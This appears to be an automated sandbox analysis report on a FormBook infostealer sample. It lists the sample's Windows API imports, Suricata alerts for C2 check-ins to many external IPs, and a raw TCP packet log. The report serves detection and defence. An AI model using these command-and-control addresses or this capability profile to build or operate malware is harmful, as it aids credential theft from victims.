LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                    GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                    OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-10-30T04:56:10.140779+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54990054.67.87.11080TCP
                                                                    2024-10-30T04:56:26.288725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549981195.161.68.880TCP
                                                                    2024-10-30T04:56:28.819959+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549982195.161.68.880TCP
                                                                    2024-10-30T04:56:31.398107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983195.161.68.880TCP
                                                                    2024-10-30T04:56:33.945080+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549984195.161.68.880TCP
                                                                    2024-10-30T04:56:40.835616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998718.141.10.10780TCP
                                                                    2024-10-30T04:56:43.523161+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998818.141.10.10780TCP
                                                                    2024-10-30T04:56:46.132508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998918.141.10.10780TCP
                                                                    2024-10-30T04:56:48.804469+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999018.141.10.10780TCP
                                                                    2024-10-30T04:56:49.169655+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549990TCP
                                                                    2024-10-30T04:56:56.070267+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549991197.189.237.18680TCP
                                                                    2024-10-30T04:56:58.617053+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549992197.189.237.18680TCP
                                                                    2024-10-30T04:57:01.163830+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549993197.189.237.18680TCP
                                                                    2024-10-30T04:57:04.070060+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549994197.189.237.18680TCP
                                                                    2024-10-30T04:57:30.742881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549995162.0.238.24680TCP
                                                                    2024-10-30T04:57:33.302020+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549996162.0.238.24680TCP
                                                                    2024-10-30T04:57:35.848987+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549997162.0.238.24680TCP
                                                                    2024-10-30T04:57:38.392162+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549998162.0.238.24680TCP
                                                                    2024-10-30T04:57:44.553479+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999931.31.196.1780TCP
                                                                    2024-10-30T04:57:47.023221+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000031.31.196.1780TCP
                                                                    2024-10-30T04:57:49.538844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000131.31.196.1780TCP
                                                                    2024-10-30T04:57:52.116985+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000231.31.196.1780TCP
                                                                    2024-10-30T04:58:05.947427+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003188.114.97.380TCP
                                                                    2024-10-30T04:58:08.500508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004188.114.97.380TCP
                                                                    2024-10-30T04:58:11.041197+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005188.114.97.380TCP
                                                                    2024-10-30T04:58:13.602539+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550006188.114.97.380TCP
                                                                    2024-10-30T04:58:20.179645+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007206.119.82.14780TCP
                                                                    2024-10-30T04:58:22.726433+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008206.119.82.14780TCP
                                                                    2024-10-30T04:58:25.276554+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009206.119.82.14780TCP
                                                                    2024-10-30T04:58:34.799142+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550010206.119.82.14780TCP
                                                                    2024-10-30T04:58:40.554521+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011162.0.209.21380TCP
                                                                    2024-10-30T04:58:43.097311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012162.0.209.21380TCP
                                                                    2024-10-30T04:58:45.631525+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013162.0.209.21380TCP
                                                                    2024-10-30T04:58:48.193549+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550014162.0.209.21380TCP
                                                                    2024-10-30T04:58:54.945252+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500153.33.130.19080TCP
                                                                    2024-10-30T04:58:56.637693+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500163.33.130.19080TCP
                                                                    2024-10-30T04:58:59.148940+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500173.33.130.19080TCP
                                                                    2024-10-30T04:59:01.765592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500183.33.130.19080TCP
                                                                    2024-10-30T04:59:07.485163+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019144.34.186.8580TCP
                                                                    2024-10-30T04:59:10.038967+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020144.34.186.8580TCP
                                                                    2024-10-30T04:59:12.589574+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021144.34.186.8580TCP
                                                                    2024-10-30T04:59:15.119690+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550022144.34.186.8580TCP
                                                                    2024-10-30T04:59:21.101320+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023136.143.186.1280TCP
                                                                    2024-10-30T04:59:23.999596+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024136.143.186.1280TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 30, 2024 04:56:09.406234980 CET4990080192.168.2.554.67.87.110
                                                                    Oct 30, 2024 04:56:09.411503077 CET804990054.67.87.110192.168.2.5
                                                                    Oct 30, 2024 04:56:09.411623955 CET4990080192.168.2.554.67.87.110
                                                                    Oct 30, 2024 04:56:09.419415951 CET4990080192.168.2.554.67.87.110
                                                                    Oct 30, 2024 04:56:09.424748898 CET804990054.67.87.110192.168.2.5
                                                                    Oct 30, 2024 04:56:10.098536968 CET804990054.67.87.110192.168.2.5
                                                                    Oct 30, 2024 04:56:10.140655994 CET804990054.67.87.110192.168.2.5
                                                                    Oct 30, 2024 04:56:10.140779018 CET4990080192.168.2.554.67.87.110
                                                                    Oct 30, 2024 04:56:10.142271042 CET4990080192.168.2.554.67.87.110
                                                                    Oct 30, 2024 04:56:10.147569895 CET804990054.67.87.110192.168.2.5
                                                                    Oct 30, 2024 04:56:25.287586927 CET4998180192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:25.292890072 CET8049981195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:25.292985916 CET4998180192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:25.303983927 CET4998180192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:25.309461117 CET8049981195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:26.233187914 CET8049981195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:26.288724899 CET4998180192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:26.390558958 CET8049981195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:26.390644073 CET4998180192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:26.820065975 CET4998180192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:27.838613033 CET4998280192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:27.843903065 CET8049982195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:27.844010115 CET4998280192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:27.854671955 CET4998280192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:27.859946966 CET8049982195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:28.769059896 CET8049982195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:28.819958925 CET4998280192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:28.935393095 CET8049982195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:28.935452938 CET4998280192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:29.367036104 CET4998280192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:30.385541916 CET4998380192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:30.390904903 CET8049983195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:30.391001940 CET4998380192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:30.401637077 CET4998380192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:30.406919956 CET8049983195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:30.407078028 CET8049983195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:31.351433039 CET8049983195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:31.398107052 CET4998380192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:31.524503946 CET8049983195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:31.524619102 CET4998380192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:31.913794994 CET4998380192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:32.939102888 CET4998480192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:32.944839954 CET8049984195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:32.944924116 CET4998480192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:32.955595970 CET4998480192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:32.960865021 CET8049984195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:33.889121056 CET8049984195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:33.945080042 CET4998480192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:34.059632063 CET8049984195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:34.059835911 CET4998480192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:34.060986996 CET4998480192.168.2.5195.161.68.8
                                                                    Oct 30, 2024 04:56:34.066257954 CET8049984195.161.68.8192.168.2.5
                                                                    Oct 30, 2024 04:56:39.332382917 CET4998780192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:39.337765932 CET804998718.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:39.337861061 CET4998780192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:39.350809097 CET4998780192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:39.356076002 CET804998718.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:40.787415981 CET804998718.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:40.835616112 CET4998780192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:40.866920948 CET4998780192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:42.039563894 CET4998880192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:42.044924021 CET804998818.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:42.045015097 CET4998880192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:42.058242083 CET4998880192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:42.063508034 CET804998818.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:43.473562956 CET804998818.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:43.523160934 CET4998880192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:43.570045948 CET4998880192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:44.649171114 CET4998980192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:44.654534101 CET804998918.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:44.654596090 CET4998980192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:44.713918924 CET4998980192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:44.719247103 CET804998918.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:44.719364882 CET804998918.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:46.086023092 CET804998918.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:46.132508039 CET4998980192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:46.226303101 CET4998980192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:47.323188066 CET4999080192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:47.328556061 CET804999018.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:47.328632116 CET4999080192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:47.395813942 CET4999080192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:47.401206017 CET804999018.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:48.754000902 CET804999018.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:48.804469109 CET4999080192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:49.169655085 CET804999018.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:49.169775963 CET4999080192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:49.170531988 CET4999080192.168.2.518.141.10.107
                                                                    Oct 30, 2024 04:56:49.175858974 CET804999018.141.10.107192.168.2.5
                                                                    Oct 30, 2024 04:56:54.551820040 CET4999180192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:54.557213068 CET8049991197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:54.557298899 CET4999180192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:54.567487001 CET4999180192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:54.572848082 CET8049991197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:56.070266962 CET4999180192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:56.076488972 CET8049991197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:56.076646090 CET4999180192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:57.088360071 CET4999280192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:57.093863964 CET8049992197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:57.094063044 CET4999280192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:57.103473902 CET4999280192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:57.108933926 CET8049992197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:58.617053032 CET4999280192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:58.623337030 CET8049992197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:58.623390913 CET4999280192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:59.635180950 CET4999380192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:59.640582085 CET8049993197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:59.640713930 CET4999380192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:59.650847912 CET4999380192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:56:59.656316996 CET8049993197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:56:59.656436920 CET8049993197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:01.163830042 CET4999380192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:01.171689034 CET8049993197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:01.171751976 CET4999380192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:02.182007074 CET4999480192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:02.187417030 CET8049994197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:02.187489986 CET4999480192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:02.195517063 CET4999480192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:02.200798988 CET8049994197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:04.018161058 CET8049994197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:04.070060015 CET4999480192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:04.274209023 CET8049994197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:04.274354935 CET4999480192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:04.302396059 CET4999480192.168.2.5197.189.237.186
                                                                    Oct 30, 2024 04:57:04.307663918 CET8049994197.189.237.186192.168.2.5
                                                                    Oct 30, 2024 04:57:30.013282061 CET4999580192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:30.018691063 CET8049995162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:30.019443035 CET4999580192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:30.031331062 CET4999580192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:30.036748886 CET8049995162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:30.704444885 CET8049995162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:30.742775917 CET8049995162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:30.742881060 CET4999580192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:31.545391083 CET4999580192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:32.568058968 CET4999680192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:32.573496103 CET8049996162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:32.573575020 CET4999680192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:32.586517096 CET4999680192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:32.591811895 CET8049996162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:33.264122009 CET8049996162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:33.301944017 CET8049996162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:33.302020073 CET4999680192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:34.101686954 CET4999680192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:35.120580912 CET4999780192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:35.126197100 CET8049997162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:35.126296043 CET4999780192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:35.137769938 CET4999780192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:35.143155098 CET8049997162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:35.143284082 CET8049997162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:35.808804035 CET8049997162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:35.848815918 CET8049997162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:35.848987103 CET4999780192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:36.648288012 CET4999780192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:37.666440964 CET4999880192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:37.672005892 CET8049998162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:37.675338030 CET4999880192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:37.681313992 CET4999880192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:37.686646938 CET8049998162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:38.351922989 CET8049998162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:38.390337944 CET8049998162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:38.392162085 CET4999880192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:38.392162085 CET4999880192.168.2.5162.0.238.246
                                                                    Oct 30, 2024 04:57:38.397533894 CET8049998162.0.238.246192.168.2.5
                                                                    Oct 30, 2024 04:57:43.502350092 CET4999980192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:43.508609056 CET804999931.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:43.508702993 CET4999980192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:43.523920059 CET4999980192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:43.530623913 CET804999931.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:44.516885042 CET804999931.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:44.549869061 CET804999931.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:44.553478956 CET4999980192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:45.038911104 CET4999980192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:46.063818932 CET5000080192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:46.069379091 CET805000031.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:46.072196960 CET5000080192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:46.085351944 CET5000080192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:46.090804100 CET805000031.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:46.972646952 CET805000031.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:47.023221016 CET5000080192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:47.116174936 CET805000031.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:47.116246939 CET5000080192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:47.589335918 CET5000080192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:48.604110003 CET5000180192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:48.609644890 CET805000131.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:48.609718084 CET5000180192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:48.620018005 CET5000180192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:48.626992941 CET805000131.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:48.627595901 CET805000131.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:49.496403933 CET805000131.31.196.17192.168.2.5
